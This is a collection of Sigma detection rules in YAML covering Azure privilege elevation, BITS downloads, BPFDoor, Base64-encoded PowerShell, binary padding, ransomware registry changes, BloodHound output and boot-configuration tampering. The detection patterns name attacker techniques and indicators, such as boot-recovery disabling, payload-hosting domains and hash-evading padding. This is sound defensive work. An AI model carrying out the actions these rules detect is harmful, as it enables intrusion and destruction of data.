title: Azure Subscription Permission Elevation Via ActivityLogs
id: 09438caa-07b1-4870-8405-1dbafe3dad95
status: test
description: |
    Detects when a user has been elevated to manage all Azure Subscriptions.
    This change should be investigated immediately if it isn't planned.
    This setting could allow an attacker access to Azure subscriptions in your environment.
references:
    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization
author: Austin Songer @austinsonger
date: 2021-11-26
modified: 2022-08-23
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.initial-access
    - attack.stealth
    - attack.t1078.004
logsource:
    product: azure
    service: activitylogs
detection:
    selection:
        operationName: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION
    condition: selection
falsepositives:
    - If this was approved by System Administrator.
level: high

title: Azure Subscription Permission Elevation Via AuditLogs
id: ca9bf243-465e-494a-9e54-bf9fc239057d
status: test
description: |
    Detects when a user has been elevated to manage all Azure Subscriptions.
    This change should be investigated immediately if it isn't planned.
    This setting could allow an attacker access to Azure subscriptions in your environment.
references:
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation
author: Austin Songer @austinsonger
date: 2021-11-26
modified: 2022-12-25
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.initial-access
    - attack.stealth
    - attack.t1078
logsource:
    product: azure
    service: auditlogs
detection:
    selection:
        Category: 'Administrative'
        OperationName: 'Assigns the caller to user access admin'
    condition: selection
falsepositives:
    - If this was approved by System Administrator.
level: high

title: BITS Transfer Job Download From Direct IP
id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7
related:
    - id: 99c840f2-2012-46fd-9141-c761987550ef
      type: similar
status: test
description: Detects a BITS transfer job downloading file(s) from a direct IP address.
references:
    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
    - https://isc.sans.edu/diary/22264
    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-11
modified: 2023-03-27
tags:
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1197
logsource:
    product: windows
    service: bits-client
detection:
    selection:
        EventID: 16403
        RemoteName|contains:
            - 'http://1'
            - 'http://2'
            - 'http://3'
            - 'http://4'
            - 'http://5'
            - 'http://6'
            - 'http://7'
            - 'http://8'
            - 'http://9'
            - 'https://1'
            - 'https://2'
            - 'https://3'
            - 'https://4'
            - 'https://5'
            - 'https://6'
            - 'https://7'
            - 'https://8'
            - 'https://9'
    filter_optional_local_networks:
        RemoteName|contains:
            - '://10.' # 10.0.0.0/8
            - '://192.168.' # 192.168.0.0/16
            - '://172.16.' # 172.16.0.0/12
            - '://172.17.'
            - '://172.18.'
            - '://172.19.'
            - '://172.20.'
            - '://172.21.'
            - '://172.22.'
            - '://172.23.'
            - '://172.24.'
            - '://172.25.'
            - '://172.26.'
            - '://172.27.'
            - '://172.28.'
            - '://172.29.'
            - '://172.30.'
            - '://172.31.'
            - '://127.' # 127.0.0.0/8
            - '://169.254.' # 169.254.0.0/16
    filter_optional_seven_zip:
        RemoteName|contains:
            # For https://7-zip.org/
            - 'https://7-'
            - 'http://7-'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: high

title: BITS Transfer Job Download From File Sharing Domains
id: d635249d-86b5-4dad-a8c7-d7272b788586
status: test
description: Detects BITS transfer job downloading files from a file sharing domain.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
    - https://twitter.com/malmoeb/status/1535142803075960832
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
author: Florian Roth (Nextron Systems)
date: 2022-06-28
modified: 2025-12-10
tags:
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1197
logsource:
    product: windows
    service: bits-client
detection:
    selection:
        EventID: 16403
        RemoteName|contains:
            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)
            - 'anonfiles.com'
            - 'cdn.discordapp.com'
            - 'ddns.net'
            - 'dl.dropboxusercontent.com'
            - 'ghostbin.co'
            - 'github.com'
            - 'glitch.me'
            - 'gofile.io'
            - 'hastebin.com'
            - 'mediafire.com'
            - 'mega.nz'
            - 'onrender.com'
            - 'pages.dev'
            - 'paste.ee'
            - 'pastebin.com'
            - 'pastebin.pl'
            - 'pastetext.net'
            - 'pixeldrain.com'
            - 'privatlab.com'
            - 'privatlab.net'
            - 'send.exploit.in'
            - 'sendspace.com'
            - 'storage.googleapis.com'
            - 'storjshare.io'
            - 'supabase.co'
            - 'temp.sh'
            - 'transfer.sh'
            - 'trycloudflare.com'
            - 'ufile.io'
            - 'w3spaces.com'
            - 'workers.dev'
    condition: selection
falsepositives:
    - Unknown
level: high

title: BITS Transfer Job Download To Potential Suspicious Folder
id: f8a56cb7-a363-44ed-a82f-5926bb44cd05
status: test
description: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
author: Florian Roth (Nextron Systems)
date: 2022-06-28
modified: 2023-03-27
tags:
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1197
logsource:
    product: windows
    service: bits-client
detection:
    selection:
        EventID: 16403
        LocalName|contains:
            # TODO: Add more interesting suspicious paths
            - '\Desktop\'
            - 'C:\Users\Public\'
            - 'C:\PerfLogs\'
    condition: selection
falsepositives:
    - Unknown
level: high

title: BPFDoor Abnormal Process ID or Lock File Accessed
id: 808146b2-9332-4d78-9416-d7e47012d83d
status: test
description: detects BPFDoor .lock and .pid files access in temporary file storage facility
references:
    - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
    - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
    - https://www.rapid7.com/blog/post/tr-bpfdoor-telecom-networks-sleeper-cells-threat-research-report/
    - https://github.com/rapid7/Rapid7-Labs/blob/741c7196ec12a0a56b63463d1fd726ff14d3a97a/BPFDoor/rapid7_detect_bpfdoor.sh
author: Rafal Piasecki
date: 2022-08-10
modified: 2026-03-30
tags:
    - attack.execution
    - attack.t1106
    - attack.t1059
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: 'PATH'
        name:
            - /var/run/aepmonend.pid
            - /var/run/auditd.lock
            - /var/run/cma.lock
            - /var/run/console-kit.pid
            - /var/run/consolekit.pid
            - /var/run/daemon.pid
            - /var/run/hald-addon.pid
            - /var/run/hald-smartd.pid
            - /var/run/haldrund.pid
            - /var/run/hp-health.pid
            - /var/run/hpasmlit.lock
            - /var/run/hpasmlited.pid
            - /var/run/kdevrund.pid
            - /var/run/lldpad.lock
            - /var/run/mcelog.pid
            - /var/run/system.pid
            - /var/run/uvp-srv.pid
            - /var/run/vmtoolagt.pid
            - /var/run/xinetd.lock
    condition: selection
falsepositives:
    - Unlikely
level: high

title: BaaUpdate.exe Suspicious DLL Load
id: 6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984
related:
    - id: 9f38c1db-e2ae-40bf-81d0-5b68f73fb512 # Suspicious BitLocker Access Agent Update Utility Execution
      type: similar
status: experimental
description: |
    Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.
    This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)
    which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
references:
    - https://github.com/rtecCyberSec/BitlockMove
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-18
tags:
    - attack.stealth
    - attack.t1218
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\BaaUpdate.exe'
        ImageLoaded|endswith: '.dll'
        ImageLoaded|contains:
            - ':\Perflogs\'
            - ':\Users\Default\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Favorites\'
            - '\Favourites\'
            - '\Links\'
            - '\Music\'
            - '\Pictures\'
            - '\ProgramData\'
            - '\Temporary Internet'
            - '\Videos\'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
id: a7c3d773-caef-227e-a7e7-c2f13c622329
related:
    - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add
      type: obsolete
status: test
description: |
    Detects attackers using tooling with bad opsec defaults.
    E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
    One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
references:
    - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
    - https://www.cobaltstrike.com/help-opsec
    - https://twitter.com/CyberRaiju/status/1251492025678983169
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
date: 2020-10-23
modified: 2024-08-15
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_werfault:
        Image|endswith: '\WerFault.exe'
        CommandLine|endswith: 'WerFault.exe'
    selection_rundll32:
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    selection_regsvcs:
        Image|endswith: '\regsvcs.exe'
        CommandLine|endswith: 'regsvcs.exe'
    selection_regasm:
        Image|endswith: '\regasm.exe'
        CommandLine|endswith: 'regasm.exe'
    selection_regsvr32:
        Image|endswith: '\regsvr32.exe'
        CommandLine|endswith: 'regsvr32.exe'
    filter_optional_edge_update:
        ParentImage|contains: '\AppData\Local\Microsoft\EdgeUpdate\Install\{'
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    filter_optional_chromium_installer:
        # As reported in https://github.com/SigmaHQ/sigma/issues/4570 and others
        ParentImage|contains:
            - '\AppData\Local\BraveSoftware\Brave-Browser\Application\'
            - '\AppData\Local\Google\Chrome\Application\'
        ParentImage|endswith: '\Installer\setup.exe'
        ParentCommandLine|contains: '--uninstall '
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    condition: 1 of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unlikely
level: high

title: Base64 Encoded PowerShell Command Detected
id: e32d4572-9826-4738-b651-95fa63747e8a
status: test
description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
references:
    - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
author: Florian Roth (Nextron Systems)
date: 2020-01-29
modified: 2023-01-26
tags:
    - attack.stealth
    - attack.t1027
    - attack.execution
    - attack.t1140
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: '::FromBase64String('
    condition: selection
falsepositives:
    - Administrative script libraries
level: high

title: Base64 MZ Header In CommandLine
id: 22e58743-4ac8-4a9f-bf19-00a0428d8c5f
status: test
description: Detects encoded base64 MZ header in the commandline
references:
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'TVqQAAMAAAAEAAAA' # MZ..........
            - 'TVpQAAIAAAAEAA8A'
            - 'TVqAAAEAAAAEABAA'
            - 'TVoAAAAAAAAAAAAA'
            - 'TVpTAQEAAAAEAAAA'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Binary Padding - Linux
id: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba
status: test
description: |
    Adversaries may use binary padding to add junk data and change the on-disk representation of malware.
    This rule detect using dd and truncate to add a junk data to file.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md
author: Igor Fits, oscd.community
date: 2020-10-13
modified: 2023-05-03
tags:
    - attack.stealth
    - attack.t1027.001
logsource:
    product: linux
    service: auditd
detection:
    selection_execve:
        type: 'EXECVE'
    keywords_truncate:
        '|all':
            - 'truncate'
            - '-s'
    keywords_dd:
        '|all':
            - 'dd'
            - 'if='
    keywords_filter:
        - 'of='
    condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter))
falsepositives:
    - Unknown
level: high
simulation:
    - type: atomic-red-team
      name: Pad Binary to Change Hash - Linux/macOS dd
      technique: T1027.001
      atomic_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a

title: Binary Padding - MacOS
id: 95361ce5-c891-4b0a-87ca-e24607884a96
status: test
description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md
    - https://linux.die.net/man/1/truncate
    - https://linux.die.net/man/1/dd
author: 'Igor Fits, Mikhail Larin, oscd.community'
date: 2020-10-19
modified: 2023-02-17
tags:
    - attack.stealth
    - attack.t1027.001
logsource:
    product: macos
    category: process_creation
detection:
    selection_truncate:
        Image|endswith: '/truncate'
        CommandLine|contains: '-s +'
    selection_dd:
        Image|endswith: '/dd'
        CommandLine|contains:
            - 'if=/dev/zero' # if input is not /dev/zero, then there is no null padding
            - 'if=/dev/random' # high-quality random data
            - 'if=/dev/urandom' # low-quality random data
    condition: 1 of selection_*
falsepositives:
    - Legitimate script work
level: high

title: Bitbucket Full Data Export Triggered
id: 195e1b9d-bfc2-4ffa-ab4e-35aef69815f8
status: test
description: Detects when full data export is attempted.
references:
    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
    - https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
    - attack.collection
    - attack.t1213.003
logsource:
    product: bitbucket
    service: audit
    definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
    selection:
        auditType.category: 'Data pipeline'
        auditType.action: 'Full data export triggered'
    condition: selection
falsepositives:
    - Legitimate user activity.
level: high

title: Bitbucket Secret Scanning Exempt Repository Added
id: b91e8d5e-0033-44fe-973f-b730316f23a1
status: test
description: Detects when a repository is exempted from secret scanning feature.
references:
    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: bitbucket
    service: audit
    definition: 'Requirements: "Basic" log level is required to receive these audit events.'
detection:
    selection:
        auditType.category: 'Repositories'
        auditType.action: 'Secret scanning exempt repository added'
    condition: selection
falsepositives:
    - Legitimate user activity.
level: high

title: Bitsadmin to Uncommon IP Server Address
id: 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3
status: test
description: Detects Bitsadmin connections to IP addresses instead of FQDN names
references:
    - https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027
author: Florian Roth (Nextron Systems)
date: 2022-06-10
modified: 2022-08-24
tags:
    - attack.command-and-control
    - attack.execution
    - attack.stealth
    - attack.t1071.001
    - attack.persistence
    - attack.t1197
    - attack.s0190
logsource:
    category: proxy
detection:
    selection:
        c-useragent|startswith: 'Microsoft BITS/'
        cs-host|endswith:
            - '1'
            - '2'
            - '3'
            - '4'
            - '5'
            - '6'
            - '7'
            - '8'
            - '9'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Bitsadmin to Uncommon TLD
id: 9eb68894-7476-4cd6-8752-23b51f5883a7
status: test
description: Detects Bitsadmin connections to domains with uncommon TLDs
references:
    - https://twitter.com/jhencinski/status/1102695118455349248
    - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2019-03-07
modified: 2023-05-17
tags:
    - attack.command-and-control
    - attack.execution
    - attack.stealth
    - attack.t1071.001
    - attack.persistence
    - attack.t1197
    - attack.s0190
logsource:
    category: proxy
detection:
    selection:
        c-useragent|startswith: 'Microsoft BITS/'
    falsepositives:
        cs-host|endswith:
            - '.com'
            - '.net'
            - '.org'
            - '.scdn.co' # spotify streaming
            - '.sfx.ms' # Microsoft domain, example request: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-08-15-21-xx-xx/PreSignInSettingsConfig.json
    condition: selection and not falsepositives
falsepositives:
    - Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca
level: high

title: Blackbyte Ransomware Registry
id: 83314318-052a-4c90-a1ad-660ece38d276
status: test
description: |
    Detects specific windows registry modifications made by BlackByte ransomware variants.
    BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
    This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
references:
    - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/
author: frack113
date: 2022-01-24
modified: 2025-10-21
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject:
            - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy'
            - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections'
            - 'HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\LongPathsEnabled'
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Unknown
level: high

title: BloodHound Collection Files
id: 02773bed-83bf-469f-b7ff-e676e7d78bab
status: test
description: Detects default file names outputted by the BloodHound collection tool SharpHound
references:
    - https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection
author: C.J. May
date: 2022-08-09
modified: 2026-02-19
tags:
    - attack.discovery
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1482
    - attack.t1069.001
    - attack.t1069.002
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - 'BloodHound.zip'
            - '_computers.json'
            - '_containers.json'
            # - '_domains.json'  # prone to false positives with ProbabilisticRevealTokenRegistry function in Google Chrome
            - '_gpos.json'
            - '_groups.json'
            - '_ous.json'
            - '_users.json'
    filter_optional_ms_winapps:
        Image|endswith: '\svchost.exe'
        TargetFilename|startswith: 'C:\Program Files\WindowsApps\Microsoft.'
        TargetFilename|endswith: '\pocket_containers.json'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise
level: high

title: Blue Mockingbird
id: c3198a27-23a0-4c2c-af19-e5328d49680e
related:
    - id: ce239692-aa94-41b3-b32f-9cab259c96ea
      type: merged
status: test
description: Attempts to detect system changes made by Blue Mockingbird
references:
    - https://redcanary.com/blog/blue-mockingbird-cryptominer/
author: Trent Liffick (@tliffick)
date: 2020-05-14
modified: 2022-10-09
tags:
    - attack.persistence
    - attack.execution
    - attack.defense-impairment
    - attack.t1112
    - attack.t1047
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    sc_cmd:
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'sc config'
            - 'wercplsupporte.dll'
    wmic_cmd:
        Image|endswith: '\wmic.exe'
        CommandLine|endswith: 'COR_PROFILER'
    condition: sc_cmd or wmic_cmd
falsepositives:
    - Unknown
level: high

title: Blue Mockingbird - Registry
id: 92b0b372-a939-44ed-a11b-5136cf680e27
related:
    - id: c3198a27-23a0-4c2c-af19-e5328d49680e
      type: derived
status: test
description: Attempts to detect system changes made by Blue Mockingbird
references:
    - https://redcanary.com/blog/blue-mockingbird-cryptominer/
author: Trent Liffick (@tliffick)
date: 2020-05-14
modified: 2023-08-17
tags:
    - attack.execution
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - attack.t1047
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith: '\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll'
    condition: selection
falsepositives:
    - Unknown
level: high

title: BlueSky Ransomware Artefacts
id: eee8311f-a752-44f0-bf2f-6b007db16300
status: test
description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.
references:
    - https://unit42.paloaltonetworks.com/bluesky-ransomware/
author: j4son
date: 2023-05-23
tags:
    - attack.impact
    - attack.t1486
    - detection.emerging-threats
logsource:
    product: windows
    service: security
detection:
    selection_access_eid:
        EventID:
            - 4663
            - 4656
    selection_access_data:
        - ObjectName|endswith: '.bluesky'
        - ObjectName|contains: 'DECRYPT FILES BLUESKY'
    selection_share_eid:
        EventID: 5145
    selection_share_data:
        - RelativeTargetName|endswith: '.bluesky'
        - RelativeTargetName|contains: 'DECRYPT FILES BLUESKY'
    condition: all of selection_access_* or all of selection_share_*
falsepositives:
    - Unknown
level: high

title: Boot Configuration Tampering Via Bcdedit.EXE
id: 1444443e-6757-43e4-9ea4-c8fc705f79a2
status: stable
description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md
    - https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html
author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
date: 2019-10-24
modified: 2023-02-15
tags:
    - attack.impact
    - attack.t1490
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\bcdedit.exe'
        - OriginalFileName: 'bcdedit.exe'
    selection_set:
        CommandLine|contains: 'set'
    selection_cli:
        - CommandLine|contains|all:
              - 'bootstatuspolicy'
              - 'ignoreallfailures'
        - CommandLine|contains|all:
              - 'recoveryenabled'
              - 'no'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
simulation:
    - type: atomic-red-team
      name: Windows - Disable Windows Recovery Console Repair
      technique: T1490
      atomic_guid: cf21060a-80b3-4238-a595-22525de4ab81